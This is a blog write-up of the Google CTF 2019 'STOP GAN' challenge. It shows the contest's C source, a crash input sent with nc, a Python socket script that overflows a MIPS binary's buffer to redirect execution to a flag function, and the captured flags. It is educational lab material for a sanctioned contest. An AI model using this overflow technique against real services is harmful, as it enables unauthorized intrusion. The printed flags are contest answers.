Skip to content

YlmzCmlttn

Cemalettin Yılmaz Blog

Menu
  • Home
  • About Me
  • Projects
    • Iot-AR
    • Magnifi-AR
    • Smarthome-IOS
    • Others
  • Categories
    • Articles
    • Augmented Reality
    • Capture The Flag
      • Google CTF
        • 2018
    • Embedded Systems
    • IoT
    • Logisim
    • My Essays
    • Nvidia Jetson
      • Jetson TX1
    • Operating Systems
      • Kali
      • Raspbian
      • Ubuntu
    • Personal
    • Programming
      • Arduino
      • C
      • C#
      • Css
      • Html
      • Js
      • Matlab
      • Node.js
      • Python
      • Swift
      • VHDL
    • Projects
      • Embedded Systems
      • Electric
      • IoT
      • IoT-AR
      • Logisim
      • Magnifi-AR
      • Pose Estimation
    • Raspberry Pi
    • Xilinx
    • Others
Menu

STOP GAN | Google CTF 2019

Posted on July 6, 2019 by Yılmaz Cemalettin

Google CTF 2019

STOP GAN

Well it seems someone can’t keep their work life and their home life separate. You vaguely recall on your home planet, posters put up everywhere that said “Loose Zips sink large commercial properties with a responsibility to the shareholders.” You wonder if there is a similar concept here. Using the credentials to access this so-called Agricultural network, you realize that SarahH was just hired as a vendor or contract worker and given access that was equivalent. You can only assume that Vendor/Contractor is the highest possible rank bestowed upon only the most revered and well regarded individuals of the land and expect information and access to flow like the Xenovian acid streams you used to bathe in as a child. The portal picture displays that small very attractive individual whom you instantly form a bond with, despite not knowing. You must meet this entity! Converse and convince them you’re meant to be! After a brief amount of time the picture shifts into a biped presumably ingesting this creature! HOW DARE THEY. You have to save them, you have to stop this from happening. Get more information about this Gubberment thing and stop this atrocity. You need to get in closer to save them – you beat on the window, but you need access to the cauliflower’s host to rescue it.

buffer-overflow.ctfcompetition.com 1337

Attachement

You can find my all CTF solution in here

When I donwloaded the attachment I saw .c and some mips binary code.

1
2
3
4
5
6
7
8
9
10
11
wget https://storage.googleapis.com/gctf-2019-attachments/4a8becb637ed2b45e247d482ea9df123eb01115fc33583c2fa0e4a69b760af4a
mv 4a8becb637ed2b45e247d482ea9df123eb01115fc33583c2fa0e4a69b760af4a Stop_Gan.zip
unzip Stop_Gan.zip
Archive:  Stop_Gan.zip
extracting: bof                    
extracting: console.c              
ls
bof  console.c  pic  Stop_Gan.zipfile console.c
console.c: C source, ASCII text
file bof
bof: ELF 32-bit LSB executable, MIPS, MIPS32 rel2 version 1 (SYSV), statically linked, for GNU/Linux 3.2.0, BuildID[sha1]=a31c48679f10dc6945e7b5e3a88b979bebe752e3, not stripped

In the .c code

C
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
 
/**
* 6e: bufferflow triggering segfault  - binary, compile with:
* gcc /tmp/console.c -o /tmp/console -static -s
*
* Console allows the player to get info on the binary.
* Crashing bof will trigger the 1st flag.
* Controlling the buffer overflow in bof will trigger the 2nd flag.
*/
 
int main() {
  setbuf(stdin, NULL);
  setbuf(stdout, NULL);
  setbuf(stderr, NULL);
  char inputs[256];
  printf("Your goal: try to crash the Cauliflower system by providing input to the program which is launched by using 'run' command.\n Bonus flag for controlling the crash.\n");
  while(1) {
    printf("\nConsole commands: \nrun\nquit\n>>");
    if (fgets(inputs, 256, stdin) == NULL) {
      exit(0);
    }
    printf("Inputs: %s", inputs);
    if ( strncmp(inputs, "run\n\0", 256) == 0 ) {
      int result = system("/usr/bin/qemu-mipsel-static ./bof");
      continue;
    } else if ( strncmp(inputs, "quit\n\0", 256) == 0 ) {
      exit(0);
    } else {
      puts("Unable to determine action from your input");
      exit(0);
    }
  }
  return 0;
}

It says you can compile this source but I want to use original file.

I can open bof file with using qemu-mipsel.

In this question. As I understand we must to crash program with given input. So that in this case, I must to use buffer overflow method.

1
2
3
python -c "print 'a' * 500" | qemu-mipsel bof
Cauliflower systems never crash >>
segfault detected! ***CRASH***could not open flag

It happens. So that I will try in web service

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
nc buffer-overflow.ctfcompetition.com 1337
Your goal: try to crash the Cauliflower system by providing input to the program which is launched by using 'run' command.
Bonus flag for controlling the crash.
 
Console commands:
run
quit
>>run
Inputs: run
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
CTF{Why_does_cauliflower_threaten_us}
Cauliflower systems never crash >>
segfault detected! ***CRASH***
Console commands:
run
quit
>>

It works. So I will try to with python code.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
python -c "print('run\n' + 'a'*500)"| nc buffer-overflow.ctfcompetition.com 1337
Your goal: try to crash the Cauliflower system by providing input to the program which is launched by using 'run' command.
Bonus flag for controlling the crash.
 
Console commands:
run
quit
>>Inputs: run
CTF{Why_does_cauliflower_threaten_us}
Cauliflower systems never crash >>
segfault detected! ***CRASH***
Console commands:
run
quit

Soo We found flag

CTF{Why_does_cauliflower_threaten_us}

Start to find Bonus flag.

I am try to find new adress for the print bonus flag. In this case I search functions in bof file

1
2
3
nm bof | grep flag
0049ffc0 D _dl_stack_flags
00400840 t local_flag

I found the loca_flag function in bof file

We can try to jump that adress with using bof vuln

I try to find where the return address start and it is 264 so that I write bellow python to extract bonus flag

Python
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
#!/usr/bin/env python3
 
import socket
import time
def main():
        padding = "\x41" * 264
        address = "\x50\x08\x40"
        payload = padding + address + "\n"
        with socket.socket(socket.AF_INET,socket.SOCK_STREAM) as soc:
                soc.connect(("buffer-overflow.ctfcompetition.com",1337))
                time.sleep(1)
                soc.recv(1024)
                soc.send("run\n".encode())
                soc.send(payload.encode())
                time.sleep(1)
                print(soc.recv(1024).decode("utf-8"))
if __name__ == "__main__":
        main()

 

Result:

1
2
3
4
5
6
7
8
9
./exploit.py
Inputs: run
CTF{controlled_crash_causes_conditional_correspondence}
Cauliflower systems never crash >>
 
Console commands:
run
quit
>>

 

Flag: CTF{controlled_crash_causes_conditional_correspondence}

 

1 thought on “STOP GAN | Google CTF 2019”

  1. hunkerjr says:
    January 10, 2020 at 10:14 pm

    Hiya,
    Nice write up!
    For the bonus flag, could you explain the following, I cannot figure it out :
    1. how did you figure out the address starts at 264?
    “I try to find where the return address start and it is 264 so that I write bellow python to extract bonus flag”

    Then in the python script, how did you figured out those 2 lines :
    padding = “\x41” * 264
    address = “\x50\x08\x40”

    Thank you very much!

    Reply

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

My Motto

“Learn to share, Share to learn”

LinkedIn Badge

Cemalettin Yılmaz

Ads

Archives

Categories

  • Articles (1)
  • Augmented Reality (3)
  • Capture The Flag (23)
    • Google CTF (22)
      • 2018 (13)
      • 2019 (9)
    • PicoCTF (1)
      • 2019 (1)
  • Embedded Systems (3)
  • IoT (3)
  • Logisim (1)
  • My Essays (3)
  • Nvidia Jetson (5)
    • Xavier (5)
  • Operating Systems (24)
    • Kali (3)
    • Raspbian (2)
    • Ubuntu (21)
  • Others (1)
  • Personal (1)
  • Programming (44)
    • Arduino (4)
    • C (10)
    • C# (4)
    • C++ (5)
    • Css (1)
    • CUDA (6)
    • Html (1)
    • Js (2)
    • Libraries (5)
      • OpenCV (3)
      • OpenGL (2)
    • Matlab (14)
    • Node.js (5)
    • Python (6)
    • Swift (3)
  • Programs (4)
    • Tools (4)
  • Projects (21)
    • Books Solutions (8)
    • Electric (2)
    • Embedded Systems (2)
    • Energy Harvesting (1)
    • IoT (2)
    • IoT-AR (1)
    • Logisim (1)
    • Magnifi-AR (3)
    • Pose Estimation (3)
    • Smarthome-Ios (1)
  • Raspberry Pi (3)
  • Uncategorized (2)
  • YZlib (1)

Recent Posts

  • atof stof stod problems with local floating point separator in C/C++
  • Pico CTF 2019 Answers
  • YZlib: Personal C++ Library
  • Drive to target | Google CTF 2019
  • FriendSpaceBookPlusAllAccessRedPremium | Google CTF 2019

Recent Comments

  • AbaShelha on Ghidra Installation on Ubuntu |18.04, 16.04, 14.04
  • Peter on Ghidra Installation on Ubuntu |18.04, 16.04, 14.04
  • Yılmaz Cemalettin on Ghidra Installation on Ubuntu |18.04, 16.04, 14.04
  • Yılmaz Cemalettin on 16-Bit CPU on Logisim
  • Jenny on 16-Bit CPU on Logisim
  • MOON on 16-Bit CPU on Logisim
  • anti on Ghidra Installation on Ubuntu |18.04, 16.04, 14.04
  • hunkerjr on STOP GAN | Google CTF 2019
  • Shaq on 16-Bit CPU on Logisim
  • NURUL AFIQAH MOHD HASBULLAH on 16-Bit CPU on Logisim

Linkedln

© 2022 YlmzCmlttn | Powered by Superbs Personal Blog theme